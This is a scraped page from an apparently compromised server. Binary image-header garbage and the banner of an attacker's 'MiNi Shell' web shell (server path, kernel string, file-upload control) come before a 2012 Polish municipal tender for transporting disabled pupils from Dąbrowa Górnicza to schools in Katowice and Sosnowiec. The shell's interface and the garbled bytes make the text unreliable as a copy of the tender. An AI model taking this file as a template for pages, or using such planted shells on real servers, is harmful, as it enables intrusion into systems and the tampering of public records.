JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120809/293858-N-2012.html

<p class="kh_header"><b>Dąbrowa Górnicza: Przewóz uczniów niepełnosprawnych z Dąbrowy Górniczej do placówek oświatowych  
w Katowicach i Sosnowcu:
Zadanie nr 1
Przewóz 10 uczniów niepełnosprawnych z Dąbrowy Górniczej do Zespołu Szkolno-Przedszkolnego dla Niesłyszących i Słabo Słyszących  w Katowicach, ul. Grażyńskiego nr 17 i z powrotem.
Zadanie nr 2
Przewóz 15 uczniów niepełnosprawnych, w tym dwóch na wózkach inwalidzkich 
z Dąbrowy Górniczej do Zespołu Szkół Specjalnych nr 4 w Sosnowcu, ul. Franciszkańska 5a i z powrotem</b><br>
<b>Numer ogłoszenia: 293858 - 2012; data zamieszczenia: 09.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przewóz uczniów niepełnosprawnych z Dąbrowy Górniczej do placówek oświatowych  
w Katowicach i Sosnowcu:
Zadanie nr 1
Przewóz 10 uczniów niepełnosprawnych z Dąbrowy Górniczej do Zespołu Szkolno-Przedszkolnego dla Niesłyszących i Słabo Słyszących  w Katowicach, ul. Grażyńskiego nr 17 i z powrotem.
Zadanie nr 2
Przewóz 15 uczniów niepełnosprawnych, w tym dwóch na wózkach inwalidzkich 
z Dąbrowy Górniczej do Zespołu Szkół Specjalnych nr 4 w Sosnowcu, ul. Franciszkańska 5a i z powrotem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego o wartości zamówienia poniżej kwoty dla dostaw i usług określonej w przepisach wydanych na podstawie art. 11 ust. 8 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U. z 2010r., Nr 113, poz. 759 z późn. zm.), zwanej dalej ustawą.
1. Opis przedmiotu zamówienia:
Zadanie nr 1
Przedmiotem zamówienia jest przewóz 10 uczniów niepełnosprawnych z Dąbrowy Górniczej do Zespołu Szkolno - Przedszkolnego dla Dzieci Niesłyszących i Słabo Słyszących w Katowicach, ul. Grażyńskiego 17 i z powrotem w okresie od 3.09.2012 r. do 28.06.2013 r. z wyłączeniem dni wolnych od zajęć. 
Wykonawca zobowiązany będzie do odbioru uczniów niepełnosprawnych z wyznaczonych przez Zamawiającego przystanków (określonych w załączniku nr 1 do umowy nr 7/1), dowozu do szkoły w Katowicach przy ul. Grażyńskiego 17  oraz ich odwozu bezpośrednio po zakończonych zajęciach do wyznaczonych miejsc (zał. nr 1 do umowy nr 7/1). 
Wstępne oszacowanie trasy wynosi 50 km. Opis tras zawiera załącznik nr 1 do umowy nr 7/1 . 
Zadanie nr 2
Przedmiotem zamówienia jest przewóz 15 uczniów niepełnosprawnych, w tym dwóch na wózkach inwalidzkich z Dąbrowy Górniczej do Zespołu Szkół Specjalnych nr 4 w Sosnowcu, ul. Franciszkańska 5a i z powrotem w okresie od 3.09.2012 r. do 28.06.2013 r. z wyłączeniem dni wolnych od zajęć. 
Wykonawca zobowiązany będzie do odbioru uczniów niepełnosprawnych z wyznaczonych przez Zamawiającego przystanków (określonych w załączniku nr 1 do umowy nr 7/2), dowozu do szkoły w Sosnowcu przy ul. Franciszkańskiej 5a oraz ich odwozu bezpośrednio po zakończonych zajęciach do wyznaczonych miejsc (zał. nr 1 do umowy nr 7/2). 
Wstępne oszacowanie trasy wynosi 82 km. Opis tras zawiera załącznik nr 1 do umowy nr 7/2 .
2. Warunki realizacji umowy. Dotyczy zadania nr 1 oraz zadania nr 2
2.1.	Przed podpisaniem umowy każda trasa zostanie ponownie zmierzona komisyjnie, jej długość i przystanki zostaną zweryfikowane oraz będą stanowić załącznik do umowy.
2.2.	Zamawiający dopuszcza zmianę trasy i jej długości w sytuacji niezależnej od Zamawiającego i Wykonawcy, spowodowanej np. objazdami, większą liczbą przystanków, zmianą  miejsc zamieszkania uczniów, zmianą ilości uczniów, zgodnie z zapisami pkt. 25.4 a) i b) SIWZ.
2.3.	Harmonogram przewozu (tj. czas przywozu i odwozu uczniów niepełnosprawnych) uzależniony będzie od rozkładu zajęć, uzgodnionego z dyrektorem placówki.  
2.4.	Wykonawca zapewnia opiekuna przewozu na własny koszt. Opiekun zobowiązany jest do opieki nad uczniami od momentu odbioru uczniów z danego przystanku do wprowadzenia ich do budynku danej szkoły i tak samo w drodze powrotnej, zapewniając w ten sposób warunki bezpieczeństwa każdemu przewożonemu uczniowi podczas wsiadania, wysiadania i przejazdu, aż do momentu odebrania ucznia przez pracowników szkoły lub rodzica/opiekuna prawnego ucznia. 
2.5.	Usługa objęta niniejszym zamówieniem ma być świadczona środkami transportu przystosowanymi do przewozu osób niepełnosprawnych, spełniającymi wymogi bezpieczeństwa i kodeksu drogowego, w szczególności pojazdem wyposażonym w:
- pasy bezpieczeństwa
- ogrzewanie
-  dla zadania nr 1 - minimum 10 miejsc dla pasażerów (uczniów niepełnosprawnych) oraz miejsce dla opiekuna
-  dla zadania 2 - minimum 15 miejsc dla pasażerów (uczniów niepełnosprawnych), w tym 2 miejsca na wózki inwalidzkie oraz miejsce dla opiekuna
- dla zadania 2 - windę lub podjazd do podnoszenia wózków inwalidzkich oraz mocowania na dwa miejsca na wózki inwalidzkie.
2.6.	W przypadku awarii pojazdu Wykonawca zobowiązany będzie do niezwłocznego podstawienia pojazdu zastępczego o równorzędnym standardzie, nie później niż w ciągu jednej godziny od zaistnienia zdarzenia. 
2.7.	Stan techniczny pojazdów musi spełniać warunki dopuszczenia do ruchu drogowego. 
2.8.	Zadeklarowane środki transportu w ramach poszczególnych zadań mają posiadać aktualne badania techniczne i maja być sprawne do należytego wykonania zamówienia oraz posiadać aktualne ubezpieczenie OC i NW.
2.9.	Wykonawca zobowiązany jest wyposażyć kierowcę w telefon komórkowy i podać ten nr Zamawiającemu.
2.10.	Wykonawca zapewni ciągłość ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności na kwotę minimum 50 000 zł w okresie obowiązywania umowy. 
2.11.	Rozliczenie za wykonany przedmiot zamówienia następować będzie miesięcznie zgodnie z ceną jednostkową podaną w ofercie z uwzględnieniem ilości kilometrów po przedstawieniu Karty potwierdzenia przewozu według wzoru  będącym załącznikiem nr 2 do umowy 7/1 i (-lub)  7/2. Karta potwierdzenia musi być potwierdzona przez dyrektora szkoły, do której będą przewożeni uczniowie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w stosunku do zamówienia podstawowego, o których mowa w art. 67 ust.1 pkt. 6 Ustawy.
Realizacja zamówień uzupełniających odbywać się będzie w zakresie przewidzianym przedmiotem zamówienia i określonym kodami CPV. Wartość szacunkowa zamówień uzupełniających wyniesie nie więcej niż 30% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.17.20.00-4, 60.10.00.00-9, 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób  na podstawie art. 5 ust. 1 ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2007r., Nr 125, poz. 874 późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przez upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (lub wykonuje należycie) co najmniej 1 usługę w zakresie całorocznego transportu osób niepełnosprawnych o wartości nie mniejszej niż 100 000,00 PLN brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje sprawnym sprzętem niezbędnym do realizacji zamówienia, tj. do każdego zadania minimum 2 sprawnymi środkami  transportu przystosowanymi do przewozu osób niepełnosprawnych, spełniającymi warunki dopuszczenia do ruchu drogowego oraz niżej wymienione wymagania:
Zadanie nr 1 :
- wyposażone w pasy bezpieczeństwa i ogrzewanie
- posiadające aktualne badania techniczne i aktualne ubezpieczenie OC i NW. 
- łączna liczbie miejsc nie mniejsza niż 10 dla pasażerów (uczniów niepełnosprawnych) oraz miejsce dla opiekuna
Zadanie nr 2:
- wyposażone w pasy bezpieczeństwa i ogrzewanie
- posiadające aktualne badania techniczne i aktualne ubezpieczenie OC i NW. 
- wyposażonymi w windę lub podjazd do podnoszenia wózków inwalidzkich oraz mocowania na dwa miejsca na wózki inwalidzkie.
- łączna liczbie miejsc nie mniejsza niż 15 dla pasażerów (uczniów niepełnosprawnych), w tym dwa miejsca dla osób poruszających się na wózkach inwalidzkich oraz miejsce dla opiekuna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zadania stanowiącego przedmiot zamówienia :
Zadanie 1 i Zadanie 2:
1. minimum jedną osobą na każde zadanie posiadającą uprawnienia do prowadzenia pojazdów mechanicznych i przewozu osób na terenie kraju, która posiada prawo jazdy kategorii D 
2. minimum jedną osobą na każe zadanie do sprawowania opieki nad uczniami, która spełnia co najmniej jedno z wymienionych niżej kryteriów:
-  posiada przygotowanie pedagogiczne
-  posiada wykształcenie medyczne
-  posiada przygotowanie w zakresie udzielania pierwszej pomocy
- posiada wykształcenie w zakresie opiekuna społecznego lub pracownika socjalnego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż : 50 000,00 zł.  (dotyczy Zadania 1 i Zadania 2).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). formularz ofertowy - załącznik 1/1 i (-lub) załącznik 1/2 do SIWZ (wskazana data podpisania);
2).  pełnomocnictwo do reprezentowania:
- wymagane w przypadku gdy Wykonawcę reprezentuje w postępowaniu osoba bądź osoby, których   uprawnienie do reprezentowania nie wynika bezpośrednio z innych załączonych dokumentów, przedłożone w formie oryginału lub kopii poświadczonej przez notariusza;
- wymagane w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (dotyczy również spółki cywilnej), przedłożone w formie oryginału lub kopii poświadczonej przez notariusza.
3). zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b  Ustawy, wskazane jest aby zawierało minimum:  
a) dane pozwalające na identyfikacje stron 
b) zakres udostępniania (w zakresie wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia i sytuacji finansowej) oraz jego podstawa (np. umowa przedwstępna przyrzekająca zawarcie umowy o udostępnienie, umowy o podwykonawstwo, o współpracy, porozumienie o delegowaniu pracowników, umowa o świadczenie usług doradczych, know-how i inne umowy nienazwane) 
c) cel i czas udostępnienia (obejmujący okres realizacji zamówienia)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
a.	zmiany trasy i jej długości w sytuacji niezależnej od Zamawiającego i Wykonawcy spowodowanej np. objazdami, większą ilością przystanków, zmianą miejsc zamieszkania uczniów, zmianą ilości uczniów, przy czym maksymalna nominalna wartość umowy nie może ulec zwiększeniu. 
b.	zmniejszenia wynagrodzenia wykonawcy na skutek zmniejszenia ilości 
i wielkości zamówienia przez Zamawiającego, jednak zmniejszenie zamówienia nie może przekroczyć 20 % nominalnej wartości umowy brutto.	
c.	wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu.
d.	zmiany podatku VAT na skutek zmian w przepisach prawnych.
- w przypadku zwiększenia stawki podatku  VAT  ceny jednostkowe brutto nie mogą być wyższe niż ceny zadeklarowane w ofercie przez cały okres obowiązywania umowy. Maksymalna nominalna wartość umowy nie ulegnie zmianie w okresie obowiązywania umowy.
- w przypadku zmniejszenia stawki podatku VAT ceny jednostkowe brutto zostaną odpowiednio pomniejszone w odniesieniu do cen zadeklarowanych w ofercie. Maksymalna nominalna wartość umowy może ulec zmniejszeniu.  
e.	Zmiany kluczowego personelu Wykonawcy na skutek zdarzeń losowych, zmian kadrowo personalnych, zmian spowodowanych utratą wymaganych uprawnień bądź stanowiska, pod warunkiem równoważności posiadanych uprawnień.  
2.	W przypadku wystąpienia okoliczności wymienionych wyżej strony poinformują się natychmiast o ich zaistnieniu i w dobrej wierze rozpatrzą możliwość realizacji bądź rozwiązania umowy.
3.	Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany
przez obie strony.
4.	Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony,pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
5. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 7/1, 7/2 do SIWZ - projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Oświaty, piętro II, sala narad.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 09:00, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest współfinansowane ze środków z Unii Europejskiej.
2. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy. 
3. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w pkt 8 SIWZ oraz złożyć dokumenty  i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 SIWZ. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, dokumenty i oświadczenia wymienione w pkt  9.1.2)., 9.2.1)., 9.2.2). SIWZ Wykonawcy składają odrębnie, natomiast dokumenty wymienione w pkt 9.1.1)., 9.1.3). - 9.1.6). SIWZ  Wykonawcy składają łącznie, przy czym oświadczenie wymienione w pkt 9.1.1). SIWZ oraz formularz  ofertowy wymieniony w pkt 9.3.1). SIWZ - winny być podpisane przez uprawnionego przedstawiciela Wykonawców lub wspólnie (na jednym druku) przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
W przypadku polisy wymaganej w  ppkt. 9.1.6. SIWZ Zamawiający dopuszcza także przedstawienie jednej polisy wystawionej na Wykonawców wspólnie ubiegających się o udzielenie  zamówienia. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
4. Doprecyzowanie sekcji  II.2: Rozpoczęcie realizacji zamówienia: od 3.09.2012 r. 
Zakończenie realizacji zamówienia:  do 28.06.2013r.
5. Doprecyzowanie sekcji IV.2.1.: Przez cenę oferty Zamawiający rozumie cenę brutto, za jeden kilometr..</p>
